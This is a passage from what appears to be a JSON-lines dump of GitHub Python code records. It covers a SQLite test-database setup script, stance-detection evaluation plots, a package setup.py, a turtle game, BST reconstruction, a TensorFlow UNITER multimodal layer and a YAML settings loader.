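    # For example (hypothetical file, for illustration only): a file named\n    # views/top_invoices.sql containing \"SELECT * FROM invoices ORDER BY Total DESC\"\n    # would be registered as: CREATE VIEW IF NOT EXISTS [top_invoices] AS SELECT ...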
The view name uses the filename\n of the query\n \"\"\"\n\n conn = sq3.connect(db_path)\n cursor = conn.cursor()\n\n for file in os.listdir(view_dir):\n if not file.lower().endswith(\".sql\"):\n # skip all non .sql files\n continue\n path = os.path.join(view_dir, file)\n sql = f\"CREATE VIEW IF NOT EXISTS [{file[:-4]}] AS\\n\"\n with open(path, \"r\") as f:\n sql += f.read()\n try:\n cursor.execute(sql)\n conn.commit()\n except sq3.OperationalError:\n print(f\"failed to create view {file}\")\n continue\n\n cursor.close()\n conn.close()\n\n\nif __name__ == \"__main__\":\n args = sys.argv[1]\n if args == \"create-dump\":\n # to extract database and create dump file run...\n extract_dump(BASE_DATABASE_PATH, DUMP_PATH)\n elif args == \"load-dump\":\n # to load dump file and create test db run...\n load_dump(TEST_PATH, DUMP_PATH)\n add_views(TEST_PATH, VIEW_DIR)\n else:\n print(\"did not create anything\")\n","repo_name":"JJCoding01/dbReport","sub_path":"tests/data/db_setup.py","file_name":"db_setup.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9939366048","text":"from feature_engineering import DataSet\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom StanceDetection.utils.score import report_score\nimport seaborn as sn\n\nfrom sklearn.metrics import precision_recall_fscore_support, accuracy_score\n\n# dataset = DataSet('competition_test', 'mlp', True)\n# df = dataset.load_data('competition_test')\n\n#print(df['Headline'].nunique(), df['articleBody'].nunique(), df.shape, df.drop_duplicates().shape)\n\n# rs = df.groupby('Stance').count()\n# rs /= df.shape[0]\n# print(rs)\n\n# rs = df[df['Stance']!='unrelated']\n# x = rs.shape[0]\n# rs = rs.groupby('Stance').count()['Headline']\n# rs /= x\n# print(rs)\n\n\n\n# df = pd.read_pickle('/home/marjan/StanceDetection/data/train_lstm_bert_feats')\n# df['len_head'] = df['Headline_sentences'].apply(lambda x: x.shape[0])\n# df['len_art'] = df['article_sentences'].apply(lambda x: x.shape[0])\n\n# print(df['len_head'].quantile(q=0.5), df['len_head'].quantile(q=0.75), df['len_head'].quantile(q=0.95), df['len_head'].max())\n# print(df['len_art'].quantile(q=0.5), df['len_art'].quantile(q=0.75), df['len_art'].quantile(q=0.95), df['len_art'].max())\n\ndf = pd.read_csv('res.csv')\nprint(df[df['actual']==df['predicted']].shape[0]/df.shape[0])\nconf = report_score(df['actual'], df['predicted'], stage='final', labels=['agree', 'disagree', 'discuss', 'unrelated'])\np, r, f1, _ = precision_recall_fscore_support(df['actual'], df['predicted'], average=\"macro\")\nprint(f1)\n\nall_stances = df['actual'].values.tolist()\nfinal_pred_stance = df['predicted'].values.tolist()\n\nactual_agree = [1 if x=='agree' else 0 for x in all_stances]\npred_agree = [1 if x=='agree' else 0 for x in final_pred_stance]\n_, _, f1, _ = precision_recall_fscore_support(actual_agree, pred_agree, average=\"binary\")\nprint('agree', f1)\n\nactual_agree = [1 if x=='disagree' else 0 for x in all_stances]\npred_agree = [1 if x=='disagree' else 0 for x in final_pred_stance]\n_, _, f1, _ = precision_recall_fscore_support(actual_agree, pred_agree, average=\"binary\")\nprint('disagree', f1)\n\nactual_agree = [1 if x=='discuss' else 0 for x in all_stances]\npred_agree = [1 if x=='discuss' else 0 for x in final_pred_stance]\n_, _, f1, _ = precision_recall_fscore_support(actual_agree, pred_agree, average=\"binary\")\nprint('discuss', f1)\n\nactual_agree = [1 if x=='unrelated' else 0 for x 
\nplt.clf()\nax = plt.subplot()\nsn.heatmap(conf, annot=True, fmt='g', cmap='BuGn',\n           linewidths=4, square=True, ax=ax)\nax.set(xlabel='predicted', ylabel='actual')\nax.xaxis.set_ticklabels(['agree', 'disagree', 'discuss', 'unrelated'])\nax.yaxis.set_ticklabels(['agree', 'disagree', 'discuss', 'unrelated'])\nplt.savefig('baseline_conf.png')","repo_name":"MarjaaanSh/StanceDetection","sub_path":"visualizations.py","file_name":"visualizations.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73840446915","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nREQUIRES = ['dbus-python>=1.2.8', 'PyGObject>=3.22.0', 'pyserial>=3.4', 'PyYAML>=3.13']\n\nsetuptools.setup(\n    name=\"bumpemu\",\n    version=\"0.0.8\",\n    author=\"Frank Riley\",\n    author_email=\"fhriley@gmail.com\",\n    description=\"A bump controller emulator on Raspberry Pi Zero W.\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/fhriley/bumpemu\",\n    license='GNU GPLv3',\n    packages=setuptools.find_packages(),\n    include_package_data=True,\n    package_data={'bumpemu': ['config/presets.yml']},\n    python_requires='>=3.5',\n    install_requires=REQUIRES,\n    classifiers=[\n        \"Development Status :: 4 - Beta\",\n        \"Environment :: Console\",\n        \"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)\",\n        \"Operating System :: POSIX :: Linux\",\n        \"Programming Language :: Python :: 3 :: Only\",\n    ],\n    entry_points={\n        'console_scripts': [\n            'bumpemu-controller = bumpemu.main:main',\n            'powerlab-tester = bumpemu.charger.tester:main'\n        ]\n    }\n)\n","repo_name":"fhriley/bumpemu","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26745665466","text":"import time\nfrom turtle import Screen\nfrom player import Player, FINISH_LINE_Y\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\n\neze = Player()\ncar_manager = CarManager()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkey(eze.up, 'Up')\n\ngame_is_on = True\nwhile game_is_on:\n    time.sleep(0.1)\n    screen.update()\n\n    car_manager.create_car()\n    car_manager.move_cars()\n\n    for car in car_manager.all_cars:\n        if car.distance(eze) < 20:\n            game_is_on = not game_is_on\n            scoreboard.game_over()\n\n    if eze.ycor() > FINISH_LINE_Y:\n        eze.reset_turtle()\n        car_manager.increment_car_speed()\n        scoreboard.increase_score()\n\nscreen.exitonclick()\n","repo_name":"exerazor1911/turtle-crossing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23407348698","text":"# Reconstruct a BST from traversal data\n\n## SOLUTION: Preorder traversal gives unique BST representation.\n# First node = root\n# Second node = left subtree\n# Final subsequence with keys > first node = right subtree\n
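#\n# Worked example with the preorder list used below, [43, 23, 37, 29, 31, 41, 47, 53]:\n#   root = 43; the first key greater than 43 is 47 (index 6), so the left subtree\n#   is built from [23, 37, 29, 31, 41] and the right subtree from [47, 53], recursively.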
\n\nfrom TreeNode import Node\n\ndef inorder_traversal(root):\n\t# appends keys to the module-level 'inorder' list defined before the call below\n\tif not root:\n\t\treturn None\n\n\tif root.left:\n\t\tinorder_traversal(root.left)\n\n\tinorder.append(root.val)\n\n\tif root.right:\n\t\tinorder_traversal(root.right)\n\n\ndef reconstruct_bst(preorder):\n\tif not preorder:\n\t\treturn None\n\n\ttransition_point = next((i for i,a in enumerate(preorder) if a > preorder[0]), len(preorder))\n\n\t# for idx in range(1, len(preorder)):\n\t# \tif preorder[idx] > preorder[0]:\n\t# \t\ttransition_point = idx\n\t# \t\tbreak\n\n\troot = Node(preorder[0])\n\troot.left = reconstruct_bst(preorder[1:transition_point])\n\troot.right = reconstruct_bst(preorder[transition_point:])\n\n\treturn root\n\npreorder = [43, 23, 37, 29, 31, 41, 47, 53]\n\ntree = reconstruct_bst(preorder)\n\ninorder = []\n\ninorder_traversal(tree)\n\nprint(\"Inorder traversal of the tree: {}\".format(inorder))\n","repo_name":"sheelabhadra/Elements-Programming-Interviews","sub_path":"Binary Search Trees/reconstruct_bst.py","file_name":"reconstruct_bst.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34626356779","text":"import tensorflow as tf\n\nfrom easy_rec.python.layers import dnn\nfrom easy_rec.python.layers import multihead_cross_attention\nfrom easy_rec.python.utils.activation import get_activation\nfrom easy_rec.python.utils.shape_utils import get_shape_list\n\nif tf.__version__ >= '2.0':\n  tf = tf.compat.v1\n\n\nclass Uniter(object):\n  \"\"\"UNITER: UNiversal Image-TExt Representation Learning.\n\n  See the original paper:\n  https://arxiv.org/abs/1909.11740\n  \"\"\"\n\n  def __init__(self, model_config, feature_configs, features, uniter_config,\n               input_layer):\n    self._model_config = uniter_config\n    tower_num = 0\n    self._img_features = None\n    if input_layer.has_group('image'):\n      self._img_features, _ = input_layer(features, 'image')\n      tower_num += 1\n    self._general_features = None\n    if input_layer.has_group('general'):\n      self._general_features, _ = input_layer(features, 'general')\n      tower_num += 1\n    self._txt_seq_features = None\n    if input_layer.has_group('text'):\n      self._txt_seq_features, _, _ = input_layer(\n          features, 'text', is_combine=False)\n      tower_num += 1\n    self._use_token_type = True if tower_num > 1 else False\n    self._other_features = None\n    if input_layer.has_group('other'): # e.g. 
statistical feature\n self._other_features, _ = input_layer(features, 'other')\n tower_num += 1\n assert tower_num > 0, 'there must be one of the feature groups: [image, text, general, other]'\n\n self._general_feature_num = 0\n self._txt_feature_num, self._img_feature_num = 0, 0\n general_feature_names = set()\n img_feature_names, txt_feature_names = set(), set()\n for fea_group in model_config.feature_groups:\n if fea_group.group_name == 'general':\n self._general_feature_num = len(fea_group.feature_names)\n general_feature_names = set(fea_group.feature_names)\n assert self._general_feature_num == len(general_feature_names), (\n 'there are duplicate features in `general` feature group')\n elif fea_group.group_name == 'image':\n self._img_feature_num = len(fea_group.feature_names)\n img_feature_names = set(fea_group.feature_names)\n assert self._img_feature_num == len(img_feature_names), (\n 'there are duplicate features in `image` feature group')\n elif fea_group.group_name == 'text':\n self._txt_feature_num = len(fea_group.feature_names)\n txt_feature_names = set(fea_group.feature_names)\n assert self._txt_feature_num == len(txt_feature_names), (\n 'there are duplicate features in `text` feature group')\n\n if self._txt_feature_num > 1 or self._img_feature_num > 1:\n self._use_token_type = True\n self._token_type_vocab_size = self._txt_feature_num\n if self._img_feature_num > 0:\n self._token_type_vocab_size += 1\n if self._general_feature_num > 0:\n self._token_type_vocab_size += 1\n\n max_seq_len = 0\n txt_fea_emb_dim_list = []\n general_emb_dim_list = []\n img_fea_emb_dim_list = []\n for feature_config in feature_configs:\n fea_name = feature_config.input_names[0]\n if feature_config.HasField('feature_name'):\n fea_name = feature_config.feature_name\n if fea_name in img_feature_names:\n img_fea_emb_dim_list.append(feature_config.raw_input_dim)\n if fea_name in general_feature_names:\n general_emb_dim_list.append(feature_config.embedding_dim)\n if fea_name in txt_feature_names:\n txt_fea_emb_dim_list.append(feature_config.embedding_dim)\n if feature_config.HasField('max_seq_len'):\n assert feature_config.max_seq_len > 0, (\n 'feature config `max_seq_len` must be greater than 0 for feature: '\n + fea_name)\n if feature_config.max_seq_len > max_seq_len:\n max_seq_len = feature_config.max_seq_len\n\n unique_dim_num = len(set(txt_fea_emb_dim_list))\n assert unique_dim_num <= 1 and len(\n txt_fea_emb_dim_list\n ) == self._txt_feature_num, (\n 'Uniter requires that all `text` feature dimensions must be consistent.'\n )\n unique_dim_num = len(set(img_fea_emb_dim_list))\n assert unique_dim_num <= 1 and len(\n img_fea_emb_dim_list\n ) == self._img_feature_num, (\n 'Uniter requires that all `image` feature dimensions must be consistent.'\n )\n unique_dim_num = len(set(general_emb_dim_list))\n assert unique_dim_num <= 1 and len(\n general_emb_dim_list\n ) == self._general_feature_num, (\n 'Uniter requires that all `general` feature dimensions must be consistent.'\n )\n\n if self._txt_feature_num > 0 and uniter_config.use_position_embeddings:\n assert uniter_config.max_position_embeddings > 0, (\n 'model config `max_position_embeddings` must be greater than 0. 
')\n assert uniter_config.max_position_embeddings >= max_seq_len, (\n 'model config `max_position_embeddings` must be greater than or equal to the maximum of all feature config '\n '`max_seq_len`, which is %d' % max_seq_len)\n\n self._img_emb_size = img_fea_emb_dim_list[0] if img_fea_emb_dim_list else 0\n self._txt_emb_size = txt_fea_emb_dim_list[0] if txt_fea_emb_dim_list else 0\n self._general_emb_size = general_emb_dim_list[\n 0] if general_emb_dim_list else 0\n if self._img_features is not None:\n assert self._img_emb_size > 0, '`image` feature dimensions must be greater than 0, set by `raw_input_dim`'\n\n def text_embeddings(self, token_type_id):\n all_txt_features = []\n input_masks = []\n hidden_size = self._model_config.hidden_size\n if self._general_features is not None:\n general_features = self._general_features\n if self._general_emb_size != hidden_size:\n # Run a linear projection of `hidden_size`\n general_features = tf.reshape(\n general_features, shape=[-1, self._general_emb_size])\n general_features = tf.layers.dense(\n general_features, hidden_size, name='txt_projection')\n general_features = tf.reshape(\n general_features, shape=[-1, self._general_feature_num, hidden_size])\n\n batch_size = tf.shape(general_features)[0]\n general_features = multihead_cross_attention.embedding_postprocessor(\n general_features,\n use_token_type=self._use_token_type,\n token_type_ids=tf.ones(\n shape=tf.stack([batch_size, self._general_feature_num]),\n dtype=tf.int32) * token_type_id,\n token_type_vocab_size=self._token_type_vocab_size,\n reuse_token_type=tf.AUTO_REUSE,\n use_position_embeddings=False,\n dropout_prob=self._model_config.hidden_dropout_prob)\n\n all_txt_features.append(general_features)\n mask = tf.ones(\n shape=tf.stack([batch_size, self._general_feature_num]),\n dtype=tf.int32)\n input_masks.append(mask)\n\n if self._txt_seq_features is not None:\n\n def dynamic_mask(x, max_len):\n ones = tf.ones(shape=tf.stack([x]), dtype=tf.int32)\n zeros = tf.zeros(shape=tf.stack([max_len - x]), dtype=tf.int32)\n return tf.concat([ones, zeros], axis=0)\n\n token_type_id += len(all_txt_features)\n for i, (seq_fea, seq_len) in enumerate(self._txt_seq_features):\n batch_size, max_seq_len, emb_size = get_shape_list(seq_fea, 3)\n if emb_size != hidden_size:\n seq_fea = tf.reshape(seq_fea, shape=[-1, emb_size])\n seq_fea = tf.layers.dense(\n seq_fea, hidden_size, name='txt_seq_projection_%d' % i)\n seq_fea = tf.reshape(seq_fea, shape=[-1, max_seq_len, hidden_size])\n\n seq_fea = multihead_cross_attention.embedding_postprocessor(\n seq_fea,\n use_token_type=self._use_token_type,\n token_type_ids=tf.ones(\n shape=tf.stack([batch_size, max_seq_len]), dtype=tf.int32) *\n (i + token_type_id),\n token_type_vocab_size=self._token_type_vocab_size,\n reuse_token_type=tf.AUTO_REUSE,\n use_position_embeddings=self._model_config.use_position_embeddings,\n max_position_embeddings=self._model_config.max_position_embeddings,\n position_embedding_name='txt_position_embeddings_%d' % i,\n dropout_prob=self._model_config.hidden_dropout_prob)\n all_txt_features.append(seq_fea)\n\n input_mask = tf.map_fn(\n fn=lambda t: dynamic_mask(t, max_seq_len),\n elems=tf.to_int32(seq_len))\n input_masks.append(input_mask)\n\n return all_txt_features, input_masks\n\n def image_embeddings(self):\n if self._img_features is None:\n return None\n hidden_size = self._model_config.hidden_size\n image_features = self._img_features\n if self._img_emb_size != hidden_size:\n # Run a linear projection of `hidden_size`\n image_features 
= tf.reshape(\n image_features, shape=[-1, self._img_emb_size])\n image_features = tf.layers.dense(\n image_features, hidden_size, name='img_projection')\n image_features = tf.reshape(\n image_features, shape=[-1, self._img_feature_num, hidden_size])\n\n batch_size = tf.shape(image_features)[0]\n img_fea = multihead_cross_attention.embedding_postprocessor(\n image_features,\n use_token_type=self._use_token_type,\n token_type_ids=tf.zeros(\n shape=tf.stack([batch_size, self._img_feature_num]),\n dtype=tf.int32),\n token_type_vocab_size=self._token_type_vocab_size,\n reuse_token_type=tf.AUTO_REUSE,\n use_position_embeddings=self._model_config.use_position_embeddings,\n max_position_embeddings=self._model_config.max_position_embeddings,\n position_embedding_name='img_position_embeddings',\n dropout_prob=self._model_config.hidden_dropout_prob)\n return img_fea\n\n def __call__(self, is_training, *args, **kwargs):\n if not is_training:\n self._model_config.hidden_dropout_prob = 0.0\n self._model_config.attention_probs_dropout_prob = 0.0\n\n sub_modules = []\n\n img_fea = self.image_embeddings()\n start_token_id = 1 if self._img_feature_num > 0 else 0\n txt_features, txt_masks = self.text_embeddings(start_token_id)\n\n if img_fea is not None:\n batch_size = tf.shape(img_fea)[0]\n elif txt_features:\n batch_size = tf.shape(txt_features[0])[0]\n else:\n batch_size = None\n\n hidden_size = self._model_config.hidden_size\n if batch_size is not None:\n all_features = []\n masks = []\n cls_emb = tf.get_variable(name='cls_emb', shape=[1, 1, hidden_size])\n cls_emb = tf.tile(cls_emb, [batch_size, 1, 1])\n all_features.append(cls_emb)\n\n mask = tf.ones(shape=tf.stack([batch_size, 1]), dtype=tf.int32)\n masks.append(mask)\n\n if img_fea is not None:\n all_features.append(img_fea)\n mask = tf.ones(\n shape=tf.stack([batch_size, self._img_feature_num]), dtype=tf.int32)\n masks.append(mask)\n\n if txt_features:\n all_features.extend(txt_features)\n masks.extend(txt_masks)\n\n all_fea = tf.concat(all_features, axis=1)\n input_mask = tf.concat(masks, axis=1)\n attention_mask = multihead_cross_attention.create_attention_mask_from_input_mask(\n from_tensor=all_fea, to_mask=input_mask)\n hidden_act = get_activation(self._model_config.hidden_act)\n attention_fea = multihead_cross_attention.transformer_encoder(\n all_fea,\n hidden_size=hidden_size,\n num_hidden_layers=self._model_config.num_hidden_layers,\n num_attention_heads=self._model_config.num_attention_heads,\n attention_mask=attention_mask,\n intermediate_size=self._model_config.intermediate_size,\n intermediate_act_fn=hidden_act,\n hidden_dropout_prob=self._model_config.hidden_dropout_prob,\n attention_probs_dropout_prob=self._model_config\n .attention_probs_dropout_prob,\n initializer_range=self._model_config.initializer_range,\n name='uniter') # shape: [batch_size, seq_length, hidden_size]\n print('attention_fea:', attention_fea.shape)\n mm_fea = attention_fea[:, 0, :] # [CLS] feature\n sub_modules.append(mm_fea)\n\n if self._other_features is not None:\n if self._model_config.HasField('other_feature_dnn'):\n l2_reg = kwargs['l2_reg'] if 'l2_reg' in kwargs else 0\n other_dnn_layer = dnn.DNN(self._model_config.other_feature_dnn, l2_reg,\n 'other_dnn', is_training)\n other_fea = other_dnn_layer(self._other_features)\n else:\n other_fea = self._other_features\n sub_modules.append(other_fea)\n\n if len(sub_modules) == 1:\n return sub_modules[0]\n output = tf.concat(sub_modules, axis=-1)\n return 
output\n","repo_name":"alibaba/EasyRec","sub_path":"easy_rec/python/layers/uniter.py","file_name":"uniter.py","file_ext":"py","file_size_in_byte":12731,"program_lang":"python","lang":"en","doc_type":"code","stars":1284,"dataset":"github-code","pt":"61"} +{"seq_id":"72643347395","text":"import yaml\nimport traceback\nimport os\n\nfrom pathlib import Path\n\n\nfrom utils.exc import InvalidSettingsWarning\nfrom utils.exc import InvalidSettingsError # noqa: 401 \n\n\"\"\"\nthis is to load the settings as global variables. There are three portions\nthe first defines the variable type\nthe second is the load function which loads the variables\nthe third is the freeze function which allows saving the variables\n\n\"\"\"\n\nlocation = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nresource_location = os.path.join(location, \"resources\")\n\ndebug_level: int\nrecognize_available_cores: bool\nn_processors: int\nid_file_rt_unit: str\ntrim_ids_to_mzml_bounds: bool\nchunk_size: int\nchunking_method_threshold: int\nmax_valid_angle: float\ntime_window: float\nppm_window: int\nlabel_key: str\naa_labeling_sites_path: str\npeak_lookback: int\npeak_lookahead: int\nbaseline_lookback: int\nmin_envelopes_to_combine: int\npeak_ratio_denominator: int\nzscore_cutoff: int\nmz_proximity_tolerance: int\nrt_proximity_tolerance: float\nmin_aa_sequence_length: int\nmin_allowed_n_values: int\nstarting_enrichment_table_timepoints: int\nerror_estimation: str\nmin_non_zero_timepoints_rate: int\nmin_allowed_timepoints_enrichment: int\nminimum_allowed_sequence_rate: float\nmaximum_allowed_sequence_rate: float\nminimum_sequences_to_combine_for_protein_rate: int\nlowest_allowed_norm_isotope: float\nhighest_allowed_norm_isotope: float\nm0_decreasing_allowed_noise: float\nmedian_absolute_residuals_cutoff_single_point: float\nmedian_absolute_residuals_cutoff_two_points: float\nmedian_absolute_residuals_cutoff_general: float\ndesired_points_for_optimization_graph: int\nintensity_filter: int\nrel_height: float\nprotein_combination_method: str\nsampling_rate: int\nsmoothing_width: int\nsmoothing_order: int\nallowed_peak_variance_min: float\nallowed_neutromer_peak_variance: float\nadduct_weight: float\nvariance_weight: float\nID_weight: float\nintensity_weight: float\nhow_divided: str\nuse_chromatography_division: str\ngraph_output_format: str\nms_level: int\nmax_enrichment_allowed: float\nverbose_output: bool\n\n# TODO: add quick explanation of how this works, inc. 
'global' doc link\ndef load(settings_path):\n # NOTE: Look at the python documentation for the 'global' statement if youf\n # Want to understand how this module works\n try:\n settings_path = Path(settings_path)\n with settings_path.open('r') as f:\n s = yaml.load(f, Loader=yaml.FullLoader)\n global debug_level\n debug_level = s['debug_level']\n if debug_level not in [0, 1, 2]:\n raise InvalidSettingsWarning(\n 'Invalid debug level value given'\n )\n print('Running with debug level 0')\n debug_level = 0\n\n global recognize_available_cores\n recognize_available_cores = s['recognize_available_cores']\n\n global n_processors\n n_processors = s['n_processors']\n\n global id_file_rt_unit\n id_file_rt_unit = s['id_file_rt_unit']\n\n global trim_ids_to_mzml_bounds\n trim_ids_to_mzml_bounds = s['trim_ids_to_mzml_bounds']\n\n global chunk_size\n chunk_size = s['chunk_size']\n\n global chunking_method_threshold\n chunking_method_threshold = s['chunking_method_threshold']\n \n global max_valid_angle\n max_valid_angle = s['max_valid_angle']\n\n global time_window\n time_window = s['time_window']\n\n global ppm_window\n ppm_window = s['ppm_window']\n\n global label_key\n label_key = s[\"label_key\"]\n \n global aa_labeling_sites_path\n aa_labeling_sites_path = os.path.join(resource_location, s[\"aa_labeling_sites_path\"])\n\n global peak_lookback\n peak_lookback = s['peak_lookback']\n\n global peak_lookahead\n peak_lookahead = s['peak_lookahead']\n\n global baseline_lookback\n baseline_lookback = s['baseline_lookback']\n\n global min_envelopes_to_combine\n min_envelopes_to_combine = s['min_envelopes_to_combine']\n\n global peak_ratio_denominator\n peak_ratio_denominator = s['peak_ratio_denominator']\n\n global zscore_cutoff\n zscore_cutoff = s['zscore_cutoff']\n \n global mz_proximity_tolerance\n mz_proximity_tolerance = s[\"mz_proximity_tolerance\"]\n \n global rt_proximity_tolerance\n rt_proximity_tolerance = s[\"rt_proximity_tolerance\"]\n \n global min_aa_sequence_length\n min_aa_sequence_length = s[\"min_aa_sequence_length\"]\n \n global min_allowed_n_values\n min_allowed_n_values = s[\"min_allowed_n_values\"]\n \n global starting_enrichment_table_timepoints\n starting_enrichment_table_timepoints = s[\"starting_enrichment_table_timepoints\"]\n \n global error_estimation\n error_estimation = s[\"error_estimation\"]\n \n global min_non_zero_timepoints_rate\n min_non_zero_timepoints_rate = s[\"min_non_zero_timepoints_rate\"]\n \n global min_allowed_timepoints_enrichment\n min_allowed_timepoints_enrichment = s[\"min_allowed_timepoints_enrichment\"]\n \n global minimum_allowed_sequence_rate\n minimum_allowed_sequence_rate = s[\"minimum_allowed_sequence_rate\"]\n \n global maximum_allowed_sequence_rate\n maximum_allowed_sequence_rate = s[\"maximum_allowed_sequence_rate\"]\n \n global minimum_sequences_to_combine_for_protein_rate\n minimum_sequences_to_combine_for_protein_rate = s[\"minimum_sequences_to_combine_for_protein_rate\"]\n \n global lowest_allowed_norm_isotope\n lowest_allowed_norm_isotope = s[\"lowest_allowed_norm_isotope\"]\n \n global highest_allowed_norm_isotope\n highest_allowed_norm_isotope = s[\"highest_allowed_norm_isotope\"]\n \n global m0_decreasing_allowed_noise\n m0_decreasing_allowed_noise = s[\"m0_decreasing_allowed_noise\"]\n \n global median_absolute_residuals_cutoff_single_point\n median_absolute_residuals_cutoff_single_point = s[\"median_absolute_residuals_cutoff_single_point\"]\n \n global median_absolute_residuals_cutoff_two_points\n 
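# The TODO in the settings record above asks for a quick explanation of the
# `global` pattern that load() relies on: assigning to a name inside a
# function only rebinds the module-level attribute if the function declares
# it `global` first. A minimal, self-contained sketch of the same idea --
# the file name and key here are hypothetical stand-ins, not part of the
# DeuteRater code:
import yaml

debug_level = None  # module-level slot, like the annotated names above


def load_minimal(path):
    with open(path) as f:
        s = yaml.safe_load(f)
    global debug_level  # without this line, the assignment below would
    debug_level = s['debug_level']  # only bind a local inside load_minimal


# After load_minimal('settings.yaml') runs, any module that did
# `import settings` reads the value back as `settings.debug_level`.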
median_absolute_residuals_cutoff_two_points = s[\"median_absolute_residuals_cutoff_two_points\"]\n \n global median_absolute_residuals_cutoff_general\n median_absolute_residuals_cutoff_general = s[\"median_absolute_residuals_cutoff_general\"]\n \n global desired_points_for_optimization_graph\n desired_points_for_optimization_graph = s[\"desired_points_for_optimization_graph\"]\n \n global intensity_filter\n intensity_filter = s[\"intensity_filter\"]\n \n global rel_height\n rel_height = s[\"rel_height\"]\n \n global sampling_rate\n sampling_rate = s[\"sampling_rate\"]\n \n global protein_combination_method\n protein_combination_method = s[\"protein_combination_method\"]\n \n global smoothing_width\n smoothing_width = s[\"smoothing_width\"]\n \n global smoothing_order\n smoothing_order = s[\"smoothing_order\"]\n \n global allowed_peak_variance_min\n allowed_peak_variance_min = s[\"allowed_peak_variance_min\"]\n \n global adduct_weight\n adduct_weight = s[\"adduct_weight\"]\n \n global variance_weight\n variance_weight = s[\"variance_weight\"]\n \n global ID_weight\n ID_weight = s[\"ID_weight\"]\n \n global intensity_weight\n intensity_weight = s[\"intensity_weight\"]\n \n global how_divided\n how_divided = s[\"how_divided\"]\n \n global allowed_neutromer_peak_variance\n allowed_neutromer_peak_variance = s[\"allowed_neutromer_peak_variance\"]\n \n global ms_level\n ms_level = s[\"ms_level\"]\n \n global use_chromatography_division\n use_chromatography_division = s[\"use_chromatography_division\"]\n \n global graph_output_format\n graph_output_format = s[\"graph_output_format\"]\n \n global max_enrichment_allowed\n max_enrichment_allowed = s[\"max_enrichment_allowed\"]\n \n global verbose_output\n verbose_output = s[\"verbose_output\"]\n\n except Exception as e:\n print(e)\n traceback.print_tb(e.__traceback__)\n\n\ndef compare(settings_path, compare_path):\n try:\n settings_path = Path(settings_path)\n with settings_path.open('r') as f:\n setting = yaml.load(f, Loader=yaml.FullLoader)\n compare_path = Path(compare_path)\n with compare_path.open('r') as f:\n compare = yaml.load(f, Loader=yaml.FullLoader)\n if setting.keys() != compare.keys():\n return \"Different Keys\"\n for key in setting.keys():\n if setting[key] != compare[key]:\n return \"Mismatched Keys\"\n return \"MATCH\"\n except:\n return \"Error\"\n\ndef freeze(path=None, settings_dict = None):\n if not settings_dict:\n settings_dict = {\n 'debug_level': debug_level,\n 'recognize_available_cores': recognize_available_cores,\n 'n_processors': n_processors,\n 'id_file_rt_unit': id_file_rt_unit,\n 'trim_ids_to_mzml_bounds': trim_ids_to_mzml_bounds,\n 'chunk_size': chunk_size,\n 'chunking_method_threshold': chunking_method_threshold,\n 'max_valid_angle': max_valid_angle,\n 'time_window': time_window,\n 'ppm_window': ppm_window,\n \"label_key\": label_key,\n \"aa_labeling_sites_path\": aa_labeling_sites_path,\n 'peak_lookback': peak_lookback,\n 'peak_lookahead': peak_lookahead,\n 'baseline_lookback': baseline_lookback,\n 'min_envelopes_to_combine': min_envelopes_to_combine,\n 'peak_ratio_denominator': peak_ratio_denominator,\n 'zscore_cutoff': zscore_cutoff,\n \"max_enrichment_allowed\": max_enrichment_allowed,\n \"min_aa_sequence_length\": min_aa_sequence_length,\n \"mz_proximity_tolerance\":mz_proximity_tolerance,\n \"rt_proximity_tolerance\":rt_proximity_tolerance,\n \"min_allowed_n_values\": min_allowed_n_values,\n \"starting_enrichment_table_timepoints\": starting_enrichment_table_timepoints,\n \"error_estimation\": 
error_estimation,\n \"min_non_zero_timepoints_rate\": min_non_zero_timepoints_rate,\n \"min_allowed_timepoints_enrichment\": min_allowed_timepoints_enrichment,\n \"minimum_allowed_sequence_rate\": minimum_allowed_sequence_rate,\n \"maximum_allowed_sequence_rate\": maximum_allowed_sequence_rate,\n \"minimum_sequences_to_combine_for_protein_rate\": minimum_sequences_to_combine_for_protein_rate,\n \"lowest_allowed_norm_isotope\": lowest_allowed_norm_isotope,\n \"highest_allowed_norm_isotope\": highest_allowed_norm_isotope,\n \"m0_decreasing_allowed_noise\": m0_decreasing_allowed_noise,\n \"median_absolute_residuals_cutoff_single_point\": median_absolute_residuals_cutoff_single_point,\n \"median_absolute_residuals_cutoff_two_points\": median_absolute_residuals_cutoff_two_points,\n \"median_absolute_residuals_cutoff_general\": median_absolute_residuals_cutoff_general,\n \"desired_points_for_optimization_graph\": desired_points_for_optimization_graph,\n \"intensity_filter\": intensity_filter,\n \"rel_height\": rel_height,\n \"sampling_rate\": sampling_rate,\n \"protein_combination_method\": protein_combination_method,\n \"smoothing_width\": smoothing_width,\n \"smoothing_order\": smoothing_order,\n \"allowed_peak_variance_min\": allowed_peak_variance_min,\n \"adduct_weight\": adduct_weight,\n \"variance_weight\": variance_weight,\n \"ID_weight\": ID_weight,\n \"intensity_weight\": intensity_weight,\n \"how_divided\": how_divided,\n \"allowed_neutromer_peak_variance\": allowed_neutromer_peak_variance,\n \"ms_level\": ms_level,\n \"use_chromatography_division\": use_chromatography_division,\n \"graph_output_format\": graph_output_format,\n \"verbose_output\": verbose_output\n \n }\n if path:\n with open(path, 'w') as frozen_settings_file:\n yaml.dump(\n data=settings_dict,\n stream=frozen_settings_file,\n canonical=False\n )\n else:\n 